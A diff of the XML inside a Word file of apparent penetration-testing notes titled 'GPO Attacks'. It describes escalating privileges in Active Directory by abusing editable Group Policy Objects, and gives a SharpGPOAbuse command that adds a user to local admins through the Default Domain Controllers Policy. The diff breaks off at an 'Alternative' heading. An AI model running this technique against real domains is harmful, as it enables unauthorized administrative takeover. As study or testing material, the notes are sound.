--- a/Windows/AD/GPO Attacks.docx
+++ b/Windows/AD/GPO Attacks.docx
@@ -1,201 +1,28 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" mc:Ignorable="w14 w15 wp14 w16se w16cid w16 w16cex w16sdtdh">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
   <w:body>
-    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="2DC08235" wp14:textId="43BB6F32">
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr/>
         <w:t>GPO Attacks</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>If</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>you</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>find</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> out </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>you</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> user(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>allowed</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>manage</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> domain </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>GPOs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>you</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>perform</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> following to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>abuse</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>your</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> favor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-      </w:pPr>
-    </w:p>
+      <w:r>
+        <w:t>If you find out that you user(victim) is allowed to manage domain GPOs you can perform following to abuse in your favor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -205,25 +32,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Upload Sharphound.exe and perform </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>an</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> AD export of the schema. Parse in Bloodhound as well for a graphical </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>result</w:t>
+        <w:t>Upload Sharphound.exe and perform an AD export of the schema. Parse in Bloodhound as well for a graphical result</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -231,7 +40,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -241,46 +50,34 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Check that your user is part of a GPO </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>editing (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“GPO Managers” in the example)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-      </w:pPr>
-      <w:r>
+        <w:t>Check that your user is part of a GPO editing (“GPO Managers” in the example)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline wp14:editId="09227687" wp14:anchorId="2CFD781B">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CFD781B" wp14:editId="792671D1">
             <wp:extent cx="3476625" cy="2361208"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1031013198" name="" title=""/>
+            <wp:docPr id="1031013198" name="Picture 1031013198"/>
             <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
-            <a:graphic>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
                     <pic:cNvPr id="0" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="Rd7baace51f904d10">
+                    <a:blip r:embed="rId5" cstate="print">
                       <a:extLst>
-                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi val="0"/>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                         </a:ext>
                       </a:extLst>
                     </a:blip>
@@ -309,7 +106,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="5"/>
         </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -319,25 +116,13 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Check which policies could we </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>possibly use</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in our </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>favor(</w:t>
+        <w:t xml:space="preserve">Check which policies could we possibly use in our </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>favor (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -348,45 +133,33 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Get-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DomainPolicy</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Get-DomainPolicy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>&lt;SNIP&gt;</w:t>
@@ -394,47 +167,33 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GPODisplayName</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  : Default Domain Policy</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GPODisplayName  : Default Domain Policy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
@@ -446,39 +205,38 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>User -&gt; Effective Inbound GPOs</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-      </w:pPr>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline wp14:editId="5661560D" wp14:anchorId="1B471929">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B471929" wp14:editId="5661560D">
             <wp:extent cx="4572000" cy="2247900"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1922551806" name="" title=""/>
+            <wp:docPr id="1922551806" name="Picture 1922551806"/>
             <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
-            <a:graphic>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
                     <pic:cNvPr id="0" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="Ra798b81676ab4f34">
+                    <a:blip r:embed="rId6">
                       <a:extLst>
-                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi val="0"/>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                         </a:ext>
                       </a:extLst>
                     </a:blip>
@@ -502,16 +260,9 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -522,7 +273,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -532,9 +283,10 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> Now you can use </w:t>
       </w:r>
-      <w:hyperlink r:id="R2b564643bb4c4b98">
+      <w:hyperlink r:id="rId7">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -547,142 +299,51 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> to add your user to the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Admin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> group via vulnerable </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GPO (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>just give the username you want to add and the name of the vulnerable GPO):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>./SharpGPOAbuse.exe --</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>AddLocalAdmin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>UserAccount</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HHogan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' --</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GPOName</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'Default Domain Controllers Policy'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve"> to add your user to the Admin group via vulnerable GPO (just give the username you want to add and the name of the vulnerable GPO):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount 'HHogan' --GPOName 'Default Domain Controllers Policy'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline wp14:editId="003562B4" wp14:anchorId="7AE8398E">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE8398E" wp14:editId="3FE96DCF">
             <wp:extent cx="4572000" cy="866775"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="717244999" name="" title=""/>
+            <wp:docPr id="717244999" name="Picture 717244999"/>
             <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
-            <a:graphic>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
                     <pic:cNvPr id="0" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="R42198405085a41de">
+                    <a:blip r:embed="rId8" cstate="print">
                       <a:extLst>
-                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi val="0"/>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                         </a:ext>
                       </a:extLst>
                     </a:blip>
@@ -711,57 +372,11 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
+          <w:numId w:val="3"/>
         </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>you</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>don’t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>want</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>wait</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>run</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> a “gpupdate”</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>If you don’t want to wait run a “gpupdate”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -769,53 +384,11 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
+          <w:numId w:val="3"/>
         </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">On </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>next</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> GPO update </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>your</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> user </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>should</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> be </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>added</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>local</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve"> admins on the machine</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>On next GPO update your user should be added to local admins on the machine</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -828,7 +401,6 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:rPr/>
         <w:t>Altenative</w:t>
       </w:r>
     </w:p>
@@ -837,7 +409,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
+          <w:numId w:val="2"/>
